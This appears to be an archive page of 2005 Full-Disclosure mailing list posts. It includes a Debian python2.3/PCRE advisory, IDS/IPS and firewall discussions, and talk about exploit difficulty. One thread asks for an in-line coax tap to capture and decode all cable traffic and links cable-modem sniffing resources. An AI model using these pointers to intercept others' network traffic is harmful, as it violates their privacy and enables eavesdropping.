bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU
NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp
koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1
Ow==
=E0o1
-END PGP PUBLIC KEY BLOCK-

Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der
richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben,
informieren
Sie bitte sofort den Absender und vernichten Sie diese E-Mail.
Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder
von
Teilen dieser E-Mail ist nicht gestattet.

This E-mail might contain confidential information. If you are not the right
addressee
or you have recived this Mail in error, please inform the Sender as soon as
possible
and delete this E-Mail immediately. You are not allowed to make any copies
or
relay this E-Mail.

- Original Message - 
From: "Bernhard Mueller" <[EMAIL PROTECTED]>
To: "Full Disclosure" 
Sent: Wednesday, September 28, 2005 8:58 AM
Subject: Re: [Full-disclosure] CORE-Impact license bypass


> [EMAIL PROTECTED] wrote:
> > On Tue, 27 Sep 2005 17:53:58 +0200, Bernhard Mueller said:
> >
> > And note also that "finding a hole" and "be talented enough to create an
> > exploit" are *totally* distinct.  I found a rather nasty rootable hole
in
> > Sendmail a while back (read the release notes for 8.10.1 and the
relevant
> > manpages for the system linker - that giv

Re: [Full-disclosure] in-line coax monitoring device

[Alex Krycek]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

greetings comrades...after doing some further research, this is
what I was looking for:

http://sfs.poly.edu/presentations/boris_cable%20modem%20sniff.ppt
http://www.securityfocus.com/news/7977

SB5100 + Blackcat Combo at:
http://www.tcniso.net/ (thanks Mike)

Their "Help" page has the good info...
http://www.tcniso.net/Nav/Help/

Krycek


On Mon, 26 Sep 2005 09:46:21 -0700 Alex Krycek
<[EMAIL PROTECTED]> wrote:
>-BEGIN PGP SIGNED MESSAGE-
>Hash: SHA1
>
>Äîáðûé âå÷åð...looking for an in-line coax monitoring device that
>will give me the ability to monitor/capture and decode all traffic
>that pass by - any suggestions on how to create one, purchase one,
>sites that sell them or tell you how to build one? Ñïàñèáî
>- -The Rat
>
>   |
>   |(coax line outside house)
>   |
>   |
>- -- (Demarc)
>   |
>   |
>   |(coax line inside house)
>   |
>   |
>   |
>   |
>   |
>   |
>   |
>- -
>| in-line coax  |
>|  monitoring   |
>| device or tap |
>|   |  ( Ethernet or coax port that  )
>|   -- ( will give me the ability to )
>|   -- ( monitor/capture and decode  )
>|   |  ( all traffic that pass by.   )
>|   |
>|   |
>- -
>   |
>   |
>   |
>   |(coax line going into the cable modem)
>   |
>   |
>   |
> -
> |   |
> |   |
> |   |- (Motorola Cable Modem)
> |   |
> |   |
>/ \
>---
>
>-BEGIN PGP SIGNATURE-
>Note: This signature can be verified at
>https://www.hushtools.com/verify
>Version: Hush 2.4
>
>wkYEARECAAYFAkM4JdsACgkQGwgQ9yZzfqZX8ACaAy/cVrQNyDZVM90P3HjGNq8Yn1Q

>A
>mwUwix+IlGgdNDBfwO6gipHL7AxF
>=OtNX
>-END PGP SIGNATURE-
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkM6gNUACgkQGwgQ9yZzfqaWmgCfV7U54RosTgmsp91JljLojcgMydEA
oK565H3VW8xspHn5aShfUiPYMxw+
=696M
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 821-1] New python2.3 packages fix arbitrary code execution

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 821-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 28th, 2005http://www.debian.org/security/faq
- --

Package: python2.3
Vulnerability  : integer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CAN-2005-2491
BugTraq ID : 14620
Debian Bug : 324531

An integer overflow with a subsequent buffer overflow has been detected
in PCRE, the Perl Compatible Regular Expressions library, which allows
an attacker to execute arbitrary code, and is also present in Python.
Exploiting this vulnerability requires an attacker to specify the used
regular expression.

The old stable distribution (woody) does not contain python2.3 packages.

For the stable distribution (sarge) this problem has been fixed in
version 2.3.5-3sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.3.5-8.

We recommend that you upgrade your python2.3 packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1.dsc
  Size/MD5 checksum: 1146 c9037ce6cf68a2d5df19f97f5a355682

http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1.diff.gz
  Size/MD5 checksum:  2351981 7e1a2c22a67933614ae542df35b3acb5

http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5.orig.tar.gz
  Size/MD5 checksum:  8512566 9c35e5ca3c487e1c1f70f2fb1ccbfffe

  Architecture independent components:


http://security.debian.org/pool/updates/main/p/python2.3/idle-python2.3_2.3.5-3sarge1_all.deb
  Size/MD5 checksum:   233926 223cf091cba908e4c0dd60c982399979

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-doc_2.3.5-3sarge1_all.deb
  Size/MD5 checksum:  2859596 854e1efeddbe977279de799b251a

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-examples_2.3.5-3sarge1_all.deb
  Size/MD5 checksum:   512922 39616088287ba21d40668128023dd4eb

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1_alpha.deb
  Size/MD5 checksum:  2996296 ad472f01175b101810f4cd8230ce42ca

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge1_alpha.deb
  Size/MD5 checksum:  1754306 e38df20cc079ea0136dc466cb0d4ddcf

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge1_alpha.deb
  Size/MD5 checksum:27464 7504460294b6c214660f24b3b1e60821

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge1_alpha.deb
  Size/MD5 checksum:31240 97a090aa2a0615471f7cfa6a003e474e

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge1_alpha.deb
  Size/MD5 checksum:   110618 7b929ad7408161e72ff494fdd91f4d5c

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1_amd64.deb
  Size/MD5 checksum:  3036606 e6cfb948cc51ba1016fa72ab1d8d881b

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge1_amd64.deb
  Size/MD5 checksum:  1593708 acb2012f860ea2394ce4d59d208e0fff

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge1_amd64.deb
  Size/MD5 checksum:27044 349f90ebf6e00a7ec83e3c3414940d9a

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge1_amd64.deb
  Size/MD5 checksum:31828 94326ce547a1d484713f89baee196f05

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge1_amd64.deb
  Size/MD5 checksum:   109686 43f9cbc02557f8ec84c6b5fa0255957f

  ARM architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1_arm.deb
  Size/MD5 checksum:  2879988 034c30c2424f90fbd31a1403dd9f6a82

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge1_arm.deb
  Size/MD5 checksum:  1647238 e12e1d4f9910461132fdabbeca0026d3

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge1_arm.deb
  Size/MD5 checksum:26516 97e2e80623f47801e2ec9

Re: [Full-disclosure] Suggestion for IDS

[J. Oquendo]

On Wed, 28 Sep 2005 [EMAIL PROTECTED] wrote:

In a nutshell I would go with Sentivist.
http://www.nfr.com/solutions/download/HotPick-IPS-Review.pdf

For brief summaries of some other products:
http://www.networkintrusion.co.uk/inline.htm

> All depends on the inbound packet rate, how fast the IDS is, and how
> much RAM you're willing to buy.  Just remember that a sufficiently long
> queue is in itself a denial of service... ;)

A possible even worse threat is an out of sync admin :O

> Just remember to configure the thing sensibly - it's amazing how many
> people manage to shoot themselves in the foot, and find out the hard way
> that yes, Virginia, there ARE people out there that will forge packets
> with the source IP address of the victim's nameserver... ;)

Many IPS' whether it's a HIP or NIP have (or at least should have)
capabilities of assessing "0-day" threats and generating rules off of
them. Even for those *PS products that do, those same "out of sync" admins
will get lost in the sauce no matter what they buy. Personally I think it
becomes the job of the admin to assess threats and stay in tune with
what's going on in the industry. Keep up to date with any new threats and
step it up from there. "THAT" however becomes a bump in the road since too
many admins are lazy.

> It's *very* important to talk about definitions - there's waaay too many
> people who buy an IDS and think that by hooking it to the net, it
> magically becomes an IPS.

Way too many people also have become accustomed to dropping dollars on the
table of INSERT_CORP_HERE thinking they can buy an all inclusive security
solution only to find that it failed.

> An equally great number buy some IPS or other, and find out the hard way
> that they don't block a 0-day or a new worm.

I'd say from my own experience that someone WITH experience can craft
their own IPS of an IDS and call it a day saving money for their company
and possibly creating something equal if not better to some products. On
my little network at work I've managed to substitute many products and
appliances for what's freely available on the open source scene with some
carefull thought out and diagrammed programs that I audit pretty much
daily.

There's nothing better for me to be able to modify something too my needs
then it is to sit and wait until vendor_x's next release because they
didn't implement something. It's also better for me to be able to add a
line or two based on some thread of a new attack as opposed to sitting
around and waiting for vendor_x to verify if something is a threat or not.

While I do agree with the statement made "Quite frankly, anybody who
already has a PIX installed and wants to install an IPS needs to quantify
*exactly* what protection the PIX is failing to provide before they go
shopping for anything" to a degree, I also disagree with that statement
since it eludes to the thinking that solely a PIX will save your ass. It
won't, nor will any other firewall, nor will any other product combined
with any OTHER product and so on.

/* REDUNDANT COMMENT */ "You are the  weakest link..." People fail
miserably. Products can only do what they're told but no matter how many
acronymed buzzwords you want to throw around "Super Hip Intelligent
Threading", it's still SHIT unless you have the ability do use your own
common sense, experience knowledge, etc.


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x97B43D89
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x97B43D89

"Just one more time for the sake of sanity tell me why
 explain the gravity that drove you to this..." Assemblage
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Valdis . Kletnieks]

On Wed, 28 Sep 2005 11:48:06 +0200, Peer Janssen said:

> Really? Is there no software package capable of withholding inspected 
> packages until cleared by said IDS?

All depends on the inbound packet rate, how fast the IDS is, and how much RAM
you're willing to buy.  Just remember that a sufficiently long queue is in
itself a denial of service... ;)

> Dropping packets, closing ports and resetting connections (besides 
> logging, maybe notifying users) look like natural useful reactions to 
> the detections deliverad of an IDS to me.

Just remember to configure the thing sensibly - it's amazing how many
people manage to shoot themselves in the foot, and find out the hard way
that yes, Virginia, there ARE people out there that will forge packets
with the source IP address of the victim's nameserver... ;)

> Or are we just talking about definitions (regarding the "D" in IDS), 
> instead of talking about IDPS-ses which the OP clearly seems to imply? 
> (P for prevention)

It's *very* important to talk about definitions - there's waaay too many
people who buy an IDS and think that by hooking it to the net, it magically
becomes an IPS.

An equally great number buy some IPS or other, and find out the hard way that
they don't block a 0-day or a new worm.

> So what are the IDPS-ses you recommend?

I recommend buying one that you're able to get your brain wrapped around what
the unit *can* and *cannot* do for you.  A less functional unit that you
understand fully is a better choice than a top-of-the-line whizz-bang-3000 that
you have no clue about its actual abilities.  Quite frankly, anybody who
already has a PIX installed and wants to install an IPS needs to quantify
*exactly* what protection the PIX is failing to provide before they go shopping
for anything.



pgpD4ee611va3.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Peer Janssen]

[EMAIL PROTECTED] wrote:


On Wed, 28 Sep 2005 15:54:41 +0700, Fajar Edisya Putera said:


plan to install IDS to protect our resources
   


An IDS doesn't *protect* your resources, any more than a concealed
video surveillance camera protects anything.  It may tell you who did it, and
what they did, *after the fact*, but it won't *protect* you.
 

Really? Is there no software package capable of withholding inspected 
packages until cleared by said IDS?


If I get it right, netfilter actually IS able to reject (and log) 
packages. Why should an IDS sniffing on a level higher up on the "OSI 
chain of command" be unable to do the same?


Dropping packets, closing ports and resetting connections (besides 
logging, maybe notifying users) look like natural useful reactions to 
the detections deliverad of an IDS to me.


Or are we just talking about definitions (regarding the "D" in IDS), 
instead of talking about IDPS-ses which the OP clearly seems to imply? 
(P for prevention)


So what are the IDPS-ses you recommend?

Peer

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Valdis . Kletnieks]

On Wed, 28 Sep 2005 15:54:41 +0700, Fajar Edisya Putera said:

> Our company plan to install IDS to protect our resources, I'm already read
> about snort as NIDS, but, that's software based. I'm interesting with
> hardware based that will work transparently with our Cisco PIX, no need to
> make changes in our firewall. What's your suggestion.

Step 1: Learn that there's no *true* hardware-based solutions here.  What you're
really buying is a box with a CPU, some memory, a network interface or three,
and some software.  Many "hardware" IDS are in fact just Snort-in-a-box, or
optimized-Snort-in-a-box.  Others will be some other "software in a box".

To understand why, consider why you can't get a high-speed line card from Cisco
(which *are* lots of black-magic ASIC hardware) to do any significant filtering
to the level that Snort inspects packets

Step 2:  An IDS doesn't *protect* your resources, any more than a concealed
video surveillance camera protects anything.  It may tell you who did it, and
what they did, *after the fact*, but it won't *protect* you. (At least a
*visible* video cam might make the malefactor think twice - but who *ever*
has an IDS that's as visible as (say) the video cameras in a bank lobby??) :)


pgp8lyj4BIXOg.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Suggestion for IDS

[Fajar Edisya Putera]

Dear Experts,

Our company plan to install IDS to protect our resources, I'm already
read about snort as NIDS, but, that's software based. I'm interesting
with hardware based that will work transparently with our Cisco PIX, no
need to make changes in our firewall. What's your suggestion.

Thanks
Fajar
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] urgent info require

[Valdis . Kletnieks]

On Tue, 27 Sep 2005 09:20:57 -, adnan habib said:
> i want  to implement juniper (netscreen) solution in my company ,,, moveover 
> i want to replace cyberguard from juniper ... is there any one let me know 
> any strong point that will support me in replacement like weakness in 
> cyberguard etc,,

First off, a 'Subject: urgent info require' is likely to land you in a lot
of spam filters.  'Subject: Need comparison of netscreen and cyberguard' would
do a lot better.

It sounds like you've already made up your mind to replace the cyberguard
with netscreen - what reason(s) did you already have (so we don't repeat those)?



pgp4yVWBQ9XX7.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CORE-Impact license bypass

[Bernhard Mueller]

[EMAIL PROTECTED] wrote:
> On Tue, 27 Sep 2005 17:53:58 +0200, Bernhard Mueller said:
> 
> And note also that "finding a hole" and "be talented enough to create an
> exploit" are *totally* distinct.  I found a rather nasty rootable hole in
> Sendmail a while back (read the release notes for 8.10.1 and the relevant
> manpages for the system linker - that gives enough info to figure out what the
> bug was). Never did create a working exploit for it - I fooled with it for an
> afternoon and only got as far as proving that if somebody were to spend more
> than an afternoon on it, they *could* produce a working exploit.
> 

i agree with this. it's often much easier to find a bug than to exploit
it (see strange heap overflows and the like), and i also don't have the
time to spend days on disassembling and looking for attack vectors (and
i'm sure that other people will have more fun doing just that).
what i criticize is that *lots* of companies (at least here in my
vicinity) are selling cheap "vulnerability assessments" which actually
are nothing more than automated security scans. this leads to the
customer feeling safe when he's really wide open to attacks. often,
these people's networks can be rooted in no time.
sure, you don't have to be uber-31337 to do penetration tests (i'm
certainly not), but it should definitely go beyond the
"scan--+--google-for-exploit" approach.

regards,

-- 
_

~  DI (FH) Bernhard Mueller
~  IT Security Consultant

~  SEC-Consult Unternehmensberatung GmbH
~  www.sec-consult.com

~  A-1080 Wien  Blindengasse 3
~  Tel:   +43/676/840301718
~  Fax:   +43/(0)1/4090307-590
__
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/